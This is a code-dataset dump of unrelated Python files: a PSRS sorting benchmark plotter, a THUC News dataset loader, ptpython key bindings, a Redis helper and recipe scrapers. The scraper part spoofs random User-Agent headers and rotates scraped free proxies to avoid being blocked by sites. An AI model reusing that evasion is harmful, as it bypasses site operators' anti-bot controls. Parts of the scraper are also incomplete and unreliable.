self.config.subdirectory_discard(subdirectory_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(subdirectory_discarded,
self.config.subdirectories_get())
self.assertNotIn(subdirectory_discarded + os.sep,
self.config.subdirectories_get())
def test_subdirectories_get(self):
# Test directory names with non-ascii characters
subdirectories = ["Луноход" + os.sep, "玉兔" + os.sep]
get_result = None
self.config.subdirectories_set(subdirectories)
get_result = self.config.subdirectories_get()
self.assertCountEqual(subdirectories, get_result)
# --------------------------------- CLASSES -----------------------------------
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jhxie/psrs",
"score": 2
} |
#### File: psrs/tools/plot.py
```python
__all__ = ["speedup_plot", "runtime_tabulate", "runtime_plot",
"stdev_tabulate", "phase_pie_plot"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import math
import matplotlib
import matplotlib.pyplot as plt
import os
import random
import shutil
import struct
import subprocess
# Note 'Axes3D' is used implicitly by matplotlib (it registers the "3d" projection)
from mpl_toolkits.mplot3d import Axes3D
from typing import Dict, List, Tuple
# --------------------------------- MODULES -----------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
# The 'runtime_dict' returned by 'speedup_plot' is a 'dict' with keys
# of the following form:
RunTimeKey = Tuple[int, Tuple[int]]
ValPair = Tuple[float, float]
# an example entry in the 'runtime_dict' would be
# (1024, (1, 2, 4, 8)): [[0.4, 0.1], [0.3, 0.1], [0.2, 0.1], [0.1 0.1]]
# which denotes:
# (number of keys sorted, (number of processes used as tests)):
# [[sorting time, standard deviation (error)]]
# ------------------------------ TYPE ALIASES ---------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def speedup_plot(program: str, output: str) -> Dict[RunTimeKey, List[ValPair]]:
"""
Plots the speedup graph based on the given 'program' that implements the
Parallel Sorting by Regular Sampling algorithm and saves the graph as
'output', also returns a 'dict' containing actual runtimes in the form
described in 'TYPE ALIASES' section.
NOTE:
The PSRS program must support a command line interface of the following:
' -b -l {length} -r {run} -s {seed} -w {window}'
and this function hard-coded the length to be range of:
[2 ** e for e in range(19, 26, 2)] -> 2 ** 19 -- 2 ** 25 with the exponent stepping by 2
the number of processes is hard-coded to be range of:
[2 ** e for e in range(4)] -> 2 ** 0 -- 2 ** 3
the {run} is fixed at 7, and {window} is set to 5.
Reference:
https://docs.python.org/3/library/subprocess.html
"""
if not all(isinstance(check, str) for check in locals().values()):
raise TypeError("'program' and 'output' must be of 'str' type")
if not shutil.which(program):
raise ValueError("'program' is not found")
if not shutil.which("mpiexec"):
raise ValueError("'mpiexec' is not found")
mean_time = None
std_err = None
mpi_prefix = "mpiexec -n {process} "
psrs_flags = " -b -l {length} -r {run} -s {seed} -w {window}"
program = mpi_prefix + program + psrs_flags
argument_dict = dict(run=7, seed=10, window=5)
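# Illustration of the command assembled below: one measurement with
# 4 processes sorting 2 ** 19 keys amounts to running
#   mpiexec -n 4 <program> -b -l 524288 -r 7 -s 10 -w 5
# and unpacking two doubles (moving average, standard error) from its stdout.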
process_range = tuple(2 ** e for e in range(4))
# length_range = tuple(2 ** e for e in range(21, 28, 2))
length_range = tuple(2 ** e for e in range(19, 26, 2))
# length_range = tuple(2 ** e for e in range(9, 16, 2))
legend_range = ("o", "s", "^", "*")
color_range = ("g", "y", "m", "r")
runtime_keys = [(length, process_range) for length in length_range]
runtime_dict = {runtime_key: list() for runtime_key in runtime_keys}
speedup_vector = list()
extension = os.path.splitext(output)[-1]
if not extension:
raise ValueError("The output must have a valid file extension")
plt.title("Speedup Graph")
plt.xticks(process_range)
plt.yticks(process_range)
plt.xlabel("Number of Processes", fontsize="large")
plt.ylabel(r"Speedup ($T_1$ / $T_p$)", fontsize="large")
# The format for axis range is [xmin, xmax, ymin, ymax].
plt.axis([0, process_range[-1] + 2, 0, process_range[-1] + 2])
# The Linear Speedup Reference Line
plt.plot(process_range, process_range,
color="c", label="Linear", linestyle="--",
marker="+", markersize=10)
for length, legend, color in zip(length_range, legend_range, color_range):
argument_dict["length"] = length
speedup_vector.clear()
for process_count in process_range:
argument_dict["process"] = process_count
command = program.format(**argument_dict).split()
# Let 'psrs' program write the moving average and standard error in
# binary form, rather than the human-readable text form, because
# 'printf' cannot print exact values of floating-point numbers that
# easily.
# 'psrs' calls 'fwrite' to write the moving average and standard
# error into the 'subprocess.PIPE', and is parsed by the 'unpack'
# mechanism.
# The method 'communicate' returns a tuple of the form
# (stdout_data, stderr_data)
# here only the first element is of interest.
# The result of 'unpack' method call is a tuple regardless of the
# data to be unpacked; since the output of 'psrs' are two
# double floating-point values, only the first two elements
# are needed.
with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:
mean_time, std_err = struct.unpack("dd", proc.communicate()[0])
if 1 != process_count:
# Speedup = T1 / Tp
speedup = speedup_vector[0] / mean_time
else:
speedup = mean_time
speedup_vector.append(speedup)
runtime_dict[(length, process_range)].append([mean_time, std_err])
# The speedup for the 1 process case is always 1
# set outside the inner loop because all the speedup values in
# the 'speedup_vector' need to be calculated based on the T1
speedup_vector[0] = 1.0
plt.plot(process_range, speedup_vector,
color=color, label=_log2_exponent_get(length), linestyle="--",
marker=legend, markersize=10)
plt.legend(loc="best", title="Length")
plt.savefig(output)
plt.clf()
return runtime_dict
def runtime_tabulate(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Tabulates mean sorting time with number of processes as x axis (row) and
length of array as y axis (column).
NOTE: Assumes all the values in 'runtime' are of the same length; that is,
the same number of processes is tested for each length.
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = list()
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# standard errors are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[0] for j in i] for i in runtime_matrix]
runtime_format = [["{0:f}".format(j) for j in i] for i in runtime_matrix]
for process in process_range:
label = "{0} Process{1}".format(process, "" if 1 == process else "es")
process_labels.append(label)
# plt.axis("tight")
plt.axis("off")
plt.title("Sorting Time in Moving Average (second)")
table = plt.table(cellText=runtime_format,
rowLabels=length_labels,
colLabels=process_labels,
loc="center")
# table.set_fontsize("large")
# table.scale(1.2, 1.2)
table.scale(1, 4.5)
# figure = plt.gcf()
# figure.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def runtime_plot(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Plots the runtime using a 3-D bar chart with number of processes and length
of array as categorical variables.
Reference:
http://matplotlib.org/examples/mplot3d/bars3d_demo.html
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
color_range = ("g", "y", "m", "r")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
# Make each group (in terms of length of array in this case) evenly spaced
length_arrange = [i for i in range(len(length_range))]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = [str(i) for i in process_range]
# Make each group (in terms of number of processes) evenly spaced
process_arrange = [i for i in range(len(process_range))]
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# standard errors are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[0] for j in i] for i in runtime_matrix]
extension = os.path.splitext(output)[-1]
iterate = zip(runtime_matrix, length_arrange, length_labels, color_range)
if not extension:
raise ValueError("The 'output' must have a valid file extension")
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
ax.set_xlabel("Number of Processes")
ax.set_ylabel("Length of Array")
ax.set_zlabel("Sorting Time")
plt.title("Sorting Time Per Group")
plt.xticks(process_arrange, process_labels)
plt.yticks(length_arrange, length_labels)
for vector, length, label, color in iterate:
ax.bar(process_arrange,
vector,
zs=length,
zdir="y",
color=color,
alpha=0.5)
# fig.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def stdev_tabulate(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Tabulates standard deviation of sorting time with number of processes as x
axis (row) and length of array as y axis (column).
NOTE: Assumes all the values in 'runtime' are of the same length; that is,
the same number of processes is tested for each length.
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = list()
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# mean sorting times are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[-1] for j in i] for i in runtime_matrix]
runtime_format = [["{0:f}".format(j) for j in i] for i in runtime_matrix]
for process in process_range:
label = "{0} Process{1}".format(process, "" if 1 == process else "es")
process_labels.append(label)
# plt.axis("tight")
plt.axis("off")
plt.title("Standard Deviation for Sorting Time")
table = plt.table(cellText=runtime_format,
rowLabels=length_labels,
colLabels=process_labels,
loc="center")
# table.set_fontsize("large")
# table.scale(1.2, 1.2)
table.scale(1, 4.5)
# figure = plt.gcf()
# figure.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def phase_pie_plot(program: str, length: int, output: str):
"""
Plots a per-phase running time pie chart based on the 'length' given.
NOTE:
Number of processes is hard-coded as 4.
Reference:
http://matplotlib.org/examples/pie_and_polar_charts/pie_demo_features.html
http://stackoverflow.com/questions/19852215/
how-to-add-a-legend-to-matplotlib-pie-chart
"""
if not all(map(isinstance, (program, length, output), (str, int, str))):
raise TypeError("'program', 'length', 'output' must be of "
"'str', 'int', 'str' types, respectively")
if not shutil.which(program):
raise ValueError("'program' is not found")
if not shutil.which("mpiexec"):
raise ValueError("'mpiexec' is not found")
phase_time = [None] * 4
phase_percent = None
total_time = None
process = 4
mpi_prefix = "mpiexec -n {process} "
# use the '-p' command line flag to let the 'psrs' program return per-phase time
psrs_flags = " -b -p -l {length} -r {run} -s {seed} -w {window}"
program = mpi_prefix + program + psrs_flags
argument_dict = dict(length=length,
process=process,
run=1,
seed=10,
window=1)
color_range = ["yellowgreen", "gold", "lightskyblue", "lightcoral"]
explode_range = (0.1, 0, 0, 0)
phase_labels = ["Phase " + str(i) for i in range(1, 5)]
length_label = _log2_exponent_get(length)
title = ("Per-Phase Runtime "
"(Array Length = {0}, "
"Number of Processes = {1})").format(length_label, process)
command = program.format(**argument_dict).split()
with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:
# The method 'communicate' returns a tuple of the form
# (stdout_data, stderr_data)
# here only the first element is of interest.
phase_time[0], phase_time[1], phase_time[2], phase_time[3] = \
struct.unpack("dddd", proc.communicate()[0])
total_time = sum(phase_time)
phase_percent = [phase / total_time * 100 for phase in phase_time]
plt.title(title)
plt.pie(phase_percent,
explode=explode_range,
colors=color_range,
autopct="%1.1f%%",
shadow=True,
startangle=90)
plt.axis("equal")
plt.legend(phase_labels, loc="best")
plt.savefig(output)
plt.clf()
def _log2_exponent_get(number: float) -> str:
"""
Returns a specially formatted string of the result log2(number).
NOTE: The result log2(number) must be an integer.
"""
result = math.log2(number)
if not result.is_integer():
raise ValueError("The result exponent must be an integer")
result = int(result)
return r"$\mathregular{2^{" + str(result) + r"}}$"
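# Illustration: _log2_exponent_get(524288) returns the math-text string
# r"$\mathregular{2^{19}}$" (rendered as 2 to the 19th in plot labels);
# any input whose log2 is not an integer raises ValueError.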
def main():
"""
Main command line driver.
"""
parser = argparse.ArgumentParser()
attr_desc_dict = {
"deviation": "file name of sorting time standard deviation table",
"executable": "path to the PSRS executable",
"pie": "base file name of pie chart for per-phase sorting time",
"speedup": "file name of the speed-up plot",
"table": "file name of the running time summary table",
"runtime": "3-d bar chart of the running time summary"
}
for flag, msg in attr_desc_dict.items():
parser.add_argument("-" + flag[0],
"--" + flag,
type=str,
required=False,
help=msg)
args = parser.parse_args()
if all(getattr(args, attr) for attr in attr_desc_dict):
matplotlib.rc('font',
**{'sans-serif': 'Arial', 'family': 'sans-serif'})
runtime_dict = speedup_plot(args.executable, args.speedup)
runtime_tabulate(runtime_dict, args.table)
stdev_tabulate(runtime_dict, args.deviation)
runtime_plot(runtime_dict, args.runtime)
pie_base, pie_base_ext = os.path.splitext(args.pie)
if not pie_base_ext or "." == pie_base_ext:
raise ValueError("'{pie}' must have a "
"proper extension".format(pie=args.pie))
phase_pie_plot(args.executable, 2 ** 21, pie_base + "0" + pie_base_ext)
phase_pie_plot(args.executable, 2 ** 27, pie_base + "1" + pie_base_ext)
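# Usage sketch (file names are arbitrary placeholders):
#   python plot.py -e ./psrs -s speedup.png -t table.png \
#       -d stdev.png -r runtime.png -p phase.png
# All six options must be given, otherwise the 'if all(...)' guard above
# skips the plotting entirely.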
# -------------------------------- FUNCTIONS ----------------------------------
if __name__ == "__main__":
main()
``` |
{
"source": "jhxu-org/datasets",
"score": 2
} |
#### File: datasets/thuc_news/thuc_news.py
```python
import csv
import ctypes
import os
import datasets
csv.field_size_limit(int(ctypes.c_ulong(-1).value // 2))
_CITATION = """\
@misc{xujianhua,
title={page xxx},
author={<NAME> and <NAME> and <NAME>},
year={2015},
eprint={1509.01626},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
"""
_DESCRIPTION = """\
THUCTC(THU Chinese Text Classification)是由清华大学自然语言处理实验室推出的中文文本分类工具包,能够自动高效地实现用户自定义的文本分类语料的训练、\
评测、分类功能。文本分类通常包括特征选取、特征降维、分类模型学习三个步骤。如何选取合适的文本特征并进行降维,是中文文本分类的挑战性问题。、
我组根据多年在中文文本分类的研究经验,在THUCTC中选取二字串bigram作为特征单元,特征降维方法为Chi-square,权重计算方法为tfidf,、
分类模型使用的是LibSVM或LibLinear。THUCTC对于开放领域的长文本具有良好的普适性,不依赖于任何中文分词工具的性能,具有准确率高、测试速度快的优点。
"""
_DATA_URL = "http://127.0.0.1/thuc_news.zip"
_CLS = ['体育', '娱乐', '家居', '彩票', '房产', '教育', '时尚', '时政', '星座', '游戏', '社会', '科技', '股票', '财经']
class THUC_News(datasets.GeneratorBasedBuilder):
"""THUC News dataset"""
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"content": datasets.Value("string"),
"label": datasets.features.ClassLabel(
names=_CLS
),
}
),
# No default supervised_keys (as we have to pass both premise
# and hypothesis as input).
supervised_keys=None,
homepage="", # didn't find a real homepage
citation=_CITATION,
)
def _split_generators(self, dl_manager):
dl_dir = dl_manager.download_and_extract(_DATA_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TEST, gen_kwargs={"filepath": os.path.join(dl_dir, "thuc_news", "test.txt")}
),
datasets.SplitGenerator(
name=datasets.Split.TRAIN, gen_kwargs={"filepath": os.path.join(dl_dir, "thuc_news", "train.txt")}
),
]
def _generate_examples(self, filepath):
"""This function returns the examples in the raw (text) form."""
with open(filepath, encoding="utf-8") as txt_file:
data = txt_file.readlines()
for id_, row in enumerate(data):
row = row.split('\t')
yield id_, {"content": row[1], "label": _CLS.index(row[0])}
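# Illustration (hypothetical data line): a row of the form
#   "体育\t<article text>"
# yields {"content": "<article text>", "label": 0}, since "体育" is the
# first entry of _CLS.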
``` |
{
"source": "jhy1000/github",
"score": 3
} |
#### File: github/src/db.py
```python
import redis
def get_redis():
redis_conf = {
'host': '127.0.0.1',
'port': 6379,
'db': 0
}
pool = redis.ConnectionPool(host=redis_conf['host'], port=redis_conf['port'], db=redis_conf['db'])
return redis.StrictRedis(connection_pool=pool)
REDIS = get_redis()
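# Usage sketch (module path may differ in the actual project layout):
#   from db import REDIS
#   REDIS.set("example-key", "example-value")
#   REDIS.get("example-key")  # -> b"example-value"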
``` |
{
"source": "jhylands/ptpython",
"score": 2
} |
#### File: ptpython/ptpython/key_bindings.py
```python
from prompt_toolkit.application import get_app
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (
Condition,
emacs_insert_mode,
emacs_mode,
has_focus,
has_selection,
vi_insert_mode,
)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.named_commands import get_by_name
from prompt_toolkit.keys import Keys
from .utils import document_is_multiline_python
__all__ = [
"load_python_bindings",
"load_sidebar_bindings",
"load_confirm_exit_bindings",
]
@Condition
def tab_should_insert_whitespace():
"""
When the 'tab' key is pressed with only whitespace character before the
cursor, do autocompletion. Otherwise, insert indentation.
Except for the first character at the first line. Then always do a
completion. It doesn't make sense to start the first line with
indentation.
"""
b = get_app().current_buffer
before_cursor = b.document.current_line_before_cursor
return bool(b.text and (not before_cursor or before_cursor.isspace()))
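# Illustration: with the buffer holding "def f():\n    " and the cursor at
# the end, only whitespace precedes the cursor on that line, so this filter
# is True and the Tab binding below inserts four spaces; with "    ret"
# before the cursor it is False and Tab falls back to completion.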
def load_python_bindings(python_input):
"""
Custom key bindings.
"""
bindings = KeyBindings()
sidebar_visible = Condition(lambda: python_input.show_sidebar)
handle = bindings.add
@handle("c-l")
def _(event):
"""
Clear whole screen and render again -- also when the sidebar is visible.
"""
event.app.renderer.clear()
@handle("c-z")
def _(event):
"""
Suspend.
"""
if python_input.enable_system_bindings:
event.app.suspend_to_background()
# Delete word before cursor, but use all Python symbols as separators
# (WORD=False).
handle("c-w")(get_by_name("backward-kill-word"))
@handle("f2")
def _(event):
"""
Show/hide sidebar.
"""
python_input.show_sidebar = not python_input.show_sidebar
if python_input.show_sidebar:
event.app.layout.focus(python_input.ptpython_layout.sidebar)
else:
event.app.layout.focus_last()
@handle("f3")
def _(event):
"""
Select from the history.
"""
python_input.enter_history()
@handle("f4")
def _(event):
"""
Toggle between Vi and Emacs mode.
"""
python_input.vi_mode = not python_input.vi_mode
@handle("f6")
def _(event):
"""
Enable/Disable paste mode.
"""
python_input.paste_mode = not python_input.paste_mode
@handle(
"tab", filter=~sidebar_visible & ~has_selection & tab_should_insert_whitespace
)
def _(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
event.app.current_buffer.insert_text(" ")
@Condition
def is_multiline():
return document_is_multiline_python(python_input.default_buffer.document)
@handle(
"enter",
filter=~sidebar_visible
& ~has_selection
& (vi_insert_mode | emacs_insert_mode)
& has_focus(DEFAULT_BUFFER)
& ~is_multiline,
)
@handle(Keys.Escape, Keys.Enter, filter=~sidebar_visible & emacs_mode)
def _(event):
"""
Accept input (for single line input).
"""
b = event.current_buffer
if b.validate():
# When the cursor is at the end, and we have an empty line:
# drop the empty lines, but return the value.
b.document = Document(
text=b.text.rstrip(), cursor_position=len(b.text.rstrip())
)
b.validate_and_handle()
@handle(
"enter",
filter=~sidebar_visible
& ~has_selection
& (vi_insert_mode | emacs_insert_mode)
& has_focus(DEFAULT_BUFFER)
& is_multiline,
)
def _(event):
"""
Behaviour of the Enter key.
Auto indent after newline/Enter.
(When not in Vi navigaton mode, and when multiline is enabled.)
"""
b = event.current_buffer
empty_lines_required = python_input.accept_input_on_enter or 10000
def at_the_end(b):
"""we consider the cursor at the end when there is no text after
the cursor, or only whitespace."""
text = b.document.text_after_cursor
return text == "" or (text.isspace() and "\n" not in text)
if python_input.paste_mode:
# In paste mode, always insert text.
b.insert_text("\n")
elif at_the_end(b) and b.document.text.replace(" ", "").endswith(
"\n" * (empty_lines_required - 1)
):
# When the cursor is at the end, and we have an empty line:
# drop the empty lines, but return the value.
if b.validate():
b.document = Document(
text=b.text.rstrip(), cursor_position=len(b.text.rstrip())
)
b.validate_and_handle()
else:
auto_newline(b)
@handle(
"c-d",
filter=~sidebar_visible
& has_focus(python_input.default_buffer)
& Condition(
lambda:
# The current buffer is empty.
not get_app().current_buffer.text
),
)
def _(event):
"""
Override Control-D exit, to ask for confirmation.
"""
if python_input.confirm_exit:
# Show exit confirmation and focus it (focusing is important for
# making sure the default buffer key bindings are not active).
python_input.show_exit_confirmation = True
python_input.app.layout.focus(
python_input.ptpython_layout.exit_confirmation
)
else:
event.app.exit(exception=EOFError)
@handle("c-c", filter=has_focus(python_input.default_buffer))
def _(event):
" Abort when Control-C has been pressed. "
event.app.exit(exception=KeyboardInterrupt, style="class:aborting")
return bindings
def load_sidebar_bindings(python_input):
"""
Load bindings for the navigation in the sidebar.
"""
bindings = KeyBindings()
handle = bindings.add
sidebar_visible = Condition(lambda: python_input.show_sidebar)
@handle("up", filter=sidebar_visible)
@handle("c-p", filter=sidebar_visible)
@handle("k", filter=sidebar_visible)
def _(event):
" Go to previous option. "
python_input.selected_option_index = (
python_input.selected_option_index - 1
) % python_input.option_count
@handle("down", filter=sidebar_visible)
@handle("c-n", filter=sidebar_visible)
@handle("j", filter=sidebar_visible)
def _(event):
" Go to next option. "
python_input.selected_option_index = (
python_input.selected_option_index + 1
) % python_input.option_count
@handle("right", filter=sidebar_visible)
@handle("l", filter=sidebar_visible)
@handle(" ", filter=sidebar_visible)
def _(event):
" Select next value for current option. "
option = python_input.selected_option
option.activate_next()
@handle("left", filter=sidebar_visible)
@handle("h", filter=sidebar_visible)
def _(event):
" Select previous value for current option. "
option = python_input.selected_option
option.activate_previous()
@handle("c-c", filter=sidebar_visible)
@handle("c-d", filter=sidebar_visible)
@handle("enter", filter=sidebar_visible)
@handle("escape", filter=sidebar_visible)
def _(event):
" Hide sidebar. "
python_input.show_sidebar = False
event.app.layout.focus_last()
return bindings
def load_confirm_exit_bindings(python_input):
"""
Handle yes/no key presses when the exit confirmation is shown.
"""
bindings = KeyBindings()
handle = bindings.add
confirmation_visible = Condition(lambda: python_input.show_exit_confirmation)
@handle("y", filter=confirmation_visible)
@handle("Y", filter=confirmation_visible)
@handle("enter", filter=confirmation_visible)
@handle("c-d", filter=confirmation_visible)
def _(event):
"""
Really quit.
"""
event.app.exit(exception=EOFError, style="class:exiting")
@handle(Keys.Any, filter=confirmation_visible)
def _(event):
"""
Cancel exit.
"""
python_input.show_exit_confirmation = False
python_input.app.layout.focus_previous()
return bindings
def auto_newline(buffer):
r"""
Insert \n at the cursor position. Also add necessary padding.
"""
insert_text = buffer.insert_text
if buffer.document.current_line_after_cursor:
# When we are in the middle of a line. Always insert a newline.
insert_text("\n")
else:
# Go to new line, but also add indentation.
current_line = buffer.document.current_line_before_cursor.rstrip()
insert_text("\n")
# Unindent if the last line ends with 'pass': remove four spaces.
unindent = current_line.rstrip().endswith(" pass")
# Copy whitespace from current line
current_line2 = current_line[4:] if unindent else current_line
for c in current_line2:
if c.isspace():
insert_text(c)
else:
break
# If the last line ends with a colon, add four extra spaces.
if current_line[-1:] == ":":
for x in range(4):
insert_text(" ")
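# Illustration: pressing Enter after "    if x:" inserts a newline, copies
# the four leading spaces, then adds four more because the line ends with
# ":"; pressing Enter after "        pass" copies the indentation minus
# four spaces because the line ends with " pass".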
``` |
{
"source": "jhylands/recipe-scrapers",
"score": 3
} |
#### File: recipe-scrapers/recipe_scrapers/JsonScraper.py
```python
from .Proxy import Proxy
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import json
import requests
# some sites close their content to 'bots', so a User-Agent header must be supplied; a random one is generated below
ua = UserAgent() # From here we generate a random user agent
class JSONScraper():
header = {'User-Agent': str(ua.random)}
def __getattribute__(self, name):
"""
Decorate custom methods to handle exceptions as we want and as we
specify in the "on_exception_return" method decorator
"""
to_return = None
decorated_methods = [
'title',
'total_time',
'instructions',
'ingredients',
'links',
'URL',
'description',
'imgURL',
'sodium',
'fat',
'cholesterol',
'carbs',
'calories',
'category'
]
if name in decorated_methods:
to_return = ''
if name == 'total_time':
to_return = 0
if name == 'ingredients':
to_return = []
if name == 'links':
to_return = []
if to_return is not None:
return on_exception_return(to_return)(object.__getattribute__(self, name))
return object.__getattribute__(self, name)
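# 'on_exception_return' is assumed to be a decorator provided elsewhere in
# this package: it wraps the method so any exception yields the fallback
# chosen above, e.g. total_time() -> 0 and ingredients() -> [] on failure.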
def __init__(self, url, proxy=False, test=False):
if proxy:
self.proxies = Proxy()
self.proxy = self.proxies.getProxy()
else:
self.proxy = None
if test: # when testing, we load a file
with url:
self.soup = BeautifulSoup(
url.read(),
"html.parser"
)
else:
response = requests.get(url, headers=self.header, proxies=self.proxy)
self.soup = BeautifulSoup(response.content, 'lxml')
for recipe in self.soup.find_all('script', type='application/ld+json'):
self.JSON = recipe.text
self.data = json.loads(recipe.text)
self.url = url
def url(self):
return self.url
def host(self):
""" get the host of the url, so we can use the correct scraper (check __init__.py) """
raise NotImplementedError("This should be implemented.")
def title(self):
raise NotImplementedError("This should be implemented.")
def servings(self):
raise NotImplementedError("This should be implemented.")
def total_time(self):
""" total time it takes to prepare the recipe in minutes """
raise NotImplementedError("This should be implemented.")
def ingredients(self):
raise NotImplementedError("This should be implemented.")
def instructions(self):
raise NotImplementedError("This should be implemented.")
def URL(self):
raise NotImplementedError("This should be implemented.")
def description(self):
raise NotImplementedError("This should be implemented.")
def imgURL(self):
raise NotImplementedError("This should be implemented.")
def sodium(self):
raise NotImplementedError("This should be implemented.")
def fat(self):
raise NotImplementedError("This should be implemented.")
def cholesterol(self):
raise NotImplementedError("This should be implemented.")
def carbs(self):
raise NotImplementedError("This should be implemented.")
def calories(self):
raise NotImplementedError("This should be implemented.")
def category(self):
raise NotImplementedError("This should be implemented.")
def datePublished(self):
raise NotImplementedError("This should be implemented.")
def links(self):
invalid_href = ('#', '')
links_html = self.soup.findAll('a', href=True)
return [
link.attrs
for link in links_html
if link['href'] not in invalid_href
]
```
#### File: recipe-scrapers/recipe_scrapers/pinchofyum.py
```python
from .JsonScraper import JSONScraper
from ._utils import get_minutes, normalize_string, dateCleaner
class PinchOfYum(JSONScraper):
@classmethod
def host(self):
return 'pinchofyum.com'
def title(self):
return self.data["name"]
'''{
"@context": "https:\/\/schema.org\/",
"@type": "Recipe",
"name": "Chopped Thai Noodle Salad with Peanut Dressing",
"description": "Thai Noodle Salad with Peanut Lime Dressing - veggies, chicken, brown rice noodles, and an easy homemade dressing. My favorite salad ever!",
"author": {
"@type": "Thing",
"name": "<NAME>"
},
"image": [
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-225x225.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-260x195.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-320x180.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe.jpg"
],
"url": "https:\/\/pinchofyum.com\/thai-noodle-salad",
"recipeIngredient": [
"1\/2 cup canola oil",
"2 large cloves garlic, peeled",
"1\/3 cup low sodium soy sauce",
"1\/4 cup white distilled vinegar",
"2 tablespoons water",
"2 tablespoons honey",
"2 tablespoons sesame oil",
"1 tablespoon lemongrass or ginger paste",
"a couple BIG squeezes of lime juice (to taste)",
"1\/4 cup peanut butter",
"4 ounces brown rice noodles (affiliate link)",
"1 lb. boneless skinless chicken breasts",
"5-6 cups baby kale or spinach",
"3 large carrots, cut into small, thin pieces*",
"3 bell peppers, cut into small, thin pieces*",
"1 cup packed cilantro leaves, chopped",
"4 green onions, green parts only, chopped",
"1\/2 cup cashews or peanuts"
],
"recipeInstructions": [
"PREP: Start soaking the rice noodles in a bowl of cold water. Preheat the oven to 400 degrees.",
"DRESSING: Pulse all the dressing ingredients in a food processor EXCEPT peanut butter. Place the chicken in a plastic bag and use about 1\/4 to 1\/2 cup of the dressing (without peanut butter) to marinate the chicken in the fridge for about 15-30 minutes. Add the peanut butter to the dressing in the food processor; pulse, then taste and adjust. Set aside.",
"VEGGIES: Prep all your veggies and toss together in a bowl.",
"CHICKEN: Bake the marinated chicken for 15-20 minutes. Rest for 5-10 minutes, then cut and add to the veggies.",
"NOODLES: Drain the noodles (they should be softened at this point). Finish cooking them in a skillet over medium high heat. Add a little oil and a little dressing and toss them around until they are soft and pliable (if you need to add a little water to soften them, that works, too).",
"ASSEMBLY: Toss stir-fried noodles with the chicken and veggie mixture. Serve hot or cold. Top with extra peanuts and cilantro (and dressing, and lime juice, and sesame seeds, and...)"
],
"prepTime": "PT45M",
"cookTime": "PT20M",
"totalTime": "PT1H5M",
"recipeYield": "6",
"aggregateRating": {
"@type": "AggregateRating",
"reviewCount": 34,
"ratingValue": 4.7
}
'''
#need to figure out something for date published
def datePublished(self):
date = dateCleaner("null",6)
return date
def description(self):
return self.data["description"]
def total_time(self):
return get_minutes(self.data["totalTime"])
def ingredients(self):
# join each ingredient on its own line (trailing newline kept, as before)
return "".join(item + "\n" for item in self.data['recipeIngredient'])
def instructions(self):
# 'recipeInstructions' is an array of step strings; join them line by line
return "".join(step + "\n" for step in self.data['recipeInstructions'])
def category(self):
return self.data["recipeCategory"][0]
def imgURL(self):
return self.data["image"][3]
def sodium(self):
return self.data["nutrition"]["sodiumContent"]
def fat(self):
return self.data["nutrition"]["fatContent"]
def carbs(self):
return self.data["nutrition"]["carbohydrateContent"]
def calories(self):
return self.data["nutrition"]["calories"]
```
#### File: recipe-scrapers/recipe_scrapers/Proxy.py
```python
import random
import requests
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
# random user agent shared by the proxy scraping helpers below
ua = UserAgent()
class Proxy():
proxies = [] # Will contain proxies [ip, port]
#### adding proxy information so as not to get blocked so fast
def getProxyList(self):
# Retrieve latest proxies
url = 'https://www.sslproxies.org/'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find(id='proxylisttable')
try:
# Save proxies in the array
for row in proxies_table.tbody.find_all('tr'):
self.proxies.append({
'ip': row.find_all('td')[0].string,
'port': row.find_all('td')[1].string
})
except:
print("error in getting proxy from ssl proxies")
return self.proxies
def getProxyList2(self,proxies):
# Retrieve latest proxies
